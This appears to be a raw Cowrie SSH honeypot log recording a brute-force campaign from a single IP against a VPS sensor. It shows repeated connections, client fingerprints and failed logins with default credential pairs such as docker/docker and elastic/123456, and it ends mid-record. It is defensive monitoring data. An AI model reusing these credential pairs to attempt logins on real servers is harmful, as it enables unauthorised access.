{"eventid":"cowrie.login.failed","username":"amandabackup","password":"amandabackup","message":"login attempt [amandabackup/amandabackup] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:38.385749Z","src_ip":"212.227.125.160","session":"4cf581166643"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:39.437682Z","src_ip":"212.227.125.160","session":"4cf581166643"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41564,"dst_ip":"1.2.3.4","dst_port":22,"session":"229a2c93739c","protocol":"ssh","message":"New connection: 212.227.125.160:41564 (1.2.3.4:22) [session: 229a2c93739c]","sensor":"my-vps","timestamp":"2025-08-26T21:48:43.523879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:43.734146Z","src_ip":"212.227.125.160","session":"229a2c93739c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:43.734907Z","src_ip":"212.227.125.160","session":"229a2c93739c"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:44.253217Z","src_ip":"212.227.125.160","session":"229a2c93739c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:45.306880Z","src_ip":"212.227.125.160","session":"229a2c93739c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36956,"dst_ip":"1.2.3.4","dst_port":22,"session":"123bdc2d3a00","protocol":"ssh","message":"New connection: 212.227.125.160:36956 (1.2.3.4:22) [session: 123bdc2d3a00]","sensor":"my-vps","timestamp":"2025-08-26T21:48:49.353350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:49.369125Z","src_ip":"212.227.125.160","session":"123bdc2d3a00"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:49.418742Z","src_ip":"212.227.125.160","session":"123bdc2d3a00"}
{"eventid":"cowrie.login.failed","username":"library-koha","password":"library-koha","message":"login attempt [library-koha/library-koha] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:49.626289Z","src_ip":"212.227.125.160","session":"123bdc2d3a00"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:50.686711Z","src_ip":"212.227.125.160","session":"123bdc2d3a00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60582,"dst_ip":"1.2.3.4","dst_port":22,"session":"e88bdf9134d5","protocol":"ssh","message":"New connection: 212.227.125.160:60582 (1.2.3.4:22) [session: e88bdf9134d5]","sensor":"my-vps","timestamp":"2025-08-26T21:48:56.567329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:56.597204Z","src_ip":"212.227.125.160","session":"e88bdf9134d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:56.743953Z","src_ip":"212.227.125.160","session":"e88bdf9134d5"}
{"eventid":"cowrie.login.failed","username":"srikanth","password":"srikanth","message":"login attempt [srikanth/srikanth] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:57.454391Z","src_ip":"212.227.125.160","session":"e88bdf9134d5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:58.515608Z","src_ip":"212.227.125.160","session":"e88bdf9134d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55968,"dst_ip":"1.2.3.4","dst_port":22,"session":"38d990c8e41f","protocol":"ssh","message":"New connection: 212.227.125.160:55968 (1.2.3.4:22) [session: 38d990c8e41f]","sensor":"my-vps","timestamp":"2025-08-26T21:49:01.832651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:01.834887Z","src_ip":"212.227.125.160","session":"38d990c8e41f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:01.885303Z","src_ip":"212.227.125.160","session":"38d990c8e41f"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"dspace","message":"login attempt [dspace/dspace] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:02.047452Z","src_ip":"212.227.125.160","session":"38d990c8e41f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:03.102078Z","src_ip":"212.227.125.160","session":"38d990c8e41f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51358,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c8b57f05471","protocol":"ssh","message":"New connection: 212.227.125.160:51358 (1.2.3.4:22) [session: 2c8b57f05471]","sensor":"my-vps","timestamp":"2025-08-26T21:49:07.436093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:07.437020Z","src_ip":"212.227.125.160","session":"2c8b57f05471"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:07.503908Z","src_ip":"212.227.125.160","session":"2c8b57f05471"}
{"eventid":"cowrie.login.failed","username":"opc","password":"123456","message":"login attempt [opc/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:07.719459Z","src_ip":"212.227.125.160","session":"2c8b57f05471"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:08.785319Z","src_ip":"212.227.125.160","session":"2c8b57f05471"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46744,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d926c06eed3","protocol":"ssh","message":"New connection: 212.227.125.160:46744 (1.2.3.4:22) [session: 0d926c06eed3]","sensor":"my-vps","timestamp":"2025-08-26T21:49:13.603963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:13.604776Z","src_ip":"212.227.125.160","session":"0d926c06eed3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:13.655526Z","src_ip":"212.227.125.160","session":"0d926c06eed3"}
{"eventid":"cowrie.login.failed","username":"test3","password":"test3","message":"login attempt [test3/test3] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:13.815823Z","src_ip":"212.227.125.160","session":"0d926c06eed3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:14.887755Z","src_ip":"212.227.125.160","session":"0d926c06eed3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42130,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fd9923b376c","protocol":"ssh","message":"New connection: 212.227.125.160:42130 (1.2.3.4:22) [session: 5fd9923b376c]","sensor":"my-vps","timestamp":"2025-08-26T21:49:19.975529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:20.026039Z","src_ip":"212.227.125.160","session":"5fd9923b376c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:20.061876Z","src_ip":"212.227.125.160","session":"5fd9923b376c"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:20.271221Z","src_ip":"212.227.125.160","session":"5fd9923b376c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:21.323240Z","src_ip":"212.227.125.160","session":"5fd9923b376c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37518,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e02cb4aa88f","protocol":"ssh","message":"New connection: 212.227.125.160:37518 (1.2.3.4:22) [session: 8e02cb4aa88f]","sensor":"my-vps","timestamp":"2025-08-26T21:49:24.922214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:24.930050Z","src_ip":"212.227.125.160","session":"8e02cb4aa88f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:24.973185Z","src_ip":"212.227.125.160","session":"8e02cb4aa88f"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:25.452562Z","src_ip":"212.227.125.160","session":"8e02cb4aa88f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:26.498636Z","src_ip":"212.227.125.160","session":"8e02cb4aa88f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32908,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ce02135ade1","protocol":"ssh","message":"New connection: 212.227.125.160:32908 (1.2.3.4:22) [session: 0ce02135ade1]","sensor":"my-vps","timestamp":"2025-08-26T21:49:30.615552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:30.639169Z","src_ip":"212.227.125.160","session":"0ce02135ade1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:30.667045Z","src_ip":"212.227.125.160","session":"0ce02135ade1"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:30.844155Z","src_ip":"212.227.125.160","session":"0ce02135ade1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:32.055547Z","src_ip":"212.227.125.160","session":"0ce02135ade1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56526,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6583160699c","protocol":"ssh","message":"New connection: 212.227.125.160:56526 (1.2.3.4:22) [session: d6583160699c]","sensor":"my-vps","timestamp":"2025-08-26T21:49:36.395734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:36.397418Z","src_ip":"212.227.125.160","session":"d6583160699c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 